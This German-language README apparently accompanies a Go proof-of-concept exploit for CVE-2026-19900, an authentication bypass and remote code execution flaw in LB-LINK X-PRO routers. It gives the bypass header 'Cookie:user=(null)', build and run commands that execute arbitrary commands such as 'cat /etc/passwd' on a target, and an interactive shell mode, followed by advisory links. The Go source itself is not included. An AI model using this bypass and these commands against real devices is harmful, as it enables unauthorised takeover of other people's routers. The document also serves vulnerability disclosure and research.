
Proof-of-Concept-Exploit für CVE-2026-19900, eine Authentifizierungsumgehungs- und Remote-Codeausführungs-Schwachstelle in LB-LINK X-PRO-Routern, die die Ausführung von Befehlen über ein manipuliertes Null-User-Cookie ermöglicht.
CVE-2026-19900 Hartcodierte Anmeldedaten und Authentifizierungsumgehung RCE über Null-Benutzer.
Umgehung über Header:
Cookie:user=(null)
Erstellen und Ausführen des Skripts mit einem Zielhost:
go build cve-2026-19900-PoC.go
./cve-2026-19900-PoC -t http://target:8080/ -c "id"
Ohne Build
go run cve-2026-19900-PoC.go -t http://target:8080/ -c "cat /etc/passwd"
Interaktiver Modus
./cve-2026-19900-PoC -t http://target:8080/ -i
-t: Ziel-IP-Adresse oder Hostname (erforderlich)-c: Sende cmd-Payload-i: Interaktiver Modus (benötigt kein -c <cmd>)https://cloud.projectdiscovery.io/library/CVE-2026-19900
https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_cmd%20Indicates%20the%20unauthorized%20command%20injection/The%20LB-LINK_cmd%20command%20is%20used%20to%20inject%20information.md https://nvd.nist.gov/vuln/detail/CVE-2026-19900 https://github.com/DavCloudz/cve/blob/main/B-Link/B-Link%20AC1200%20X-PRO(AC6)%20Hardcoded%20Credentials%20Vulnerability.md https://vuldb.com/cve/CVE-2026-19900 https://vuldb.com/submit/870712